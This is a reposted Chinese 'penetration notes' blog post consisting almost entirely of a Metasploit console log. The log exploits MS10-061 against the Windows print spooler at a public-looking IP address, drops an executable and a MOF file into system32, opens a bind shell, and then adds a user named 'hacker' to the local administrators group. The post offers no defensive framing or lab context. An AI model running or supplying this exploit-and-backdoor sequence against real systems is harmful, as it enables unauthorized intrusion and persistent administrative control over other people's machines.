渗透杂记-2013-07-13
2013-07-13 10:35
316 查看
以前新浪的移过来
ms10_061_spoolss
本文出自 “文东会” 博客,转载请与作者联系!
ms10_061_spoolss
[*] Please wait while the Metasploit Pro Console initializes... [*] Starting Metasploit Console... MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM =[ metasploit v4.4.0-dev [core:4.4 api:1.0] + -- --=[ 840 exploits - 495 auxiliary - 146 post + -- --=[ 250 payloads - 27 encoders - 8 nops [*] Successfully loaded plugin: pro msf > search ms10_061 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation Vulnerability msf > use exploit/windows/smb/ms10_061_spoolss msf exploit(ms10_061_spoolss) > info Name: Microsoft Print Spooler Service Impersonation Vulnerability Module: exploit/windows/smb/ms10_061_spoolss Version: 14976 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Provided by: jduck <jduck@metasploit.com> hdm <hdm@metasploit.com> Available targets: Id Name -- ---- 0 Windows Universal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PNAME no The printer share name to use on the target RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE spoolss no The named pipe for the spooler service Payload information: Space: 1024 Avoid: 0 characters Description: This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild. References: http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20 RHOST => 142.168.2.20 msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp msf exploit(ms10_061_spoolss) > info Name: Microsoft Print Spooler Service Impersonation Vulnerability Module: exploit/windows/smb/ms10_061_spoolss Version: 14976 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Provided by: jduck <jduck@metasploit.com> hdm <hdm@metasploit.com> Available targets: Id Name -- ---- 0 Windows Universal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PNAME no The printer share name to use on the target RHOST 142.168.2.20 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE spoolss no The named pipe for the spooler service Payload information: Space: 1024 Avoid: 0 characters Description: This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild. References: http://www.osvdb.org/67988 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx msf exploit(ms10_061_spoolss) > exploit [*] Started bind handler [*] Trying target Windows Universal... [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... [*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ... [*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61 [*] Job started: 0x4 [*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe [*] Job started: 0x5 [*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof [*] Everything should be set, waiting for a session... [*] Sending stage (240 bytes) to 142.168.2.20 Microsoft Windows XP [???? 5.1.2600] (C) ???????? 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user net user \\ ?????????? ------------------------------------------------------------------------------- Administrator Guest HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy SUPPORT_388945a0 ???????????????????????????????????? C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add net user hacker 123 /add & net localgroup administrators hacker /add ?????????????? ?????????????? C:\WINDOWS\system32>net user net user \\ ?????????? ------------------------------------------------------------------------------- Administrator Guest hacker HelpAssistant IUSR_INTRA-PC IWAM_INTRA-PC shentouceshiwy SUPPORT_388945a0 ???????????????????????????????????? C:\WINDOWS\system32>
本文出自 “文东会” 博客,转载请与作者联系!
相关文章推荐
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 05-07-2013
- 2012—07—13
- C++析构函数为什么要为虚函数 http://www.cnblogs.com/lixiaohui-ambition/archive/2012/07/13/2589716.html
- Expect the Air Jordan 13 Bred 2013 to release early this year
- Apr 07 2013 php批量修改音频文件的属性
- 20171027L08-07-13-002apache日志轮询讲解
- 2013_11_13:关于 new 和delelte 的使用
- 编译chromium - vs2012 (2013-07)
- 2013=7=29 nyist 13题
- Air Jordan 13 was released in new jordan 2013 which was the last season
- 2013第35周五杂记
- w3a-Monitor-update-13-07-10
- Jordan 13 he got game release 03/16/2013
- 13.Oracle杂记——Oracle错误故障诊断监控脚本
- 07SkypeForBusiness2015--Lync2010升级到2013部署Lync2013边缘服务器
- 2013-07-15 ios 题库软件学习总结
- Android面试题__2013_07_25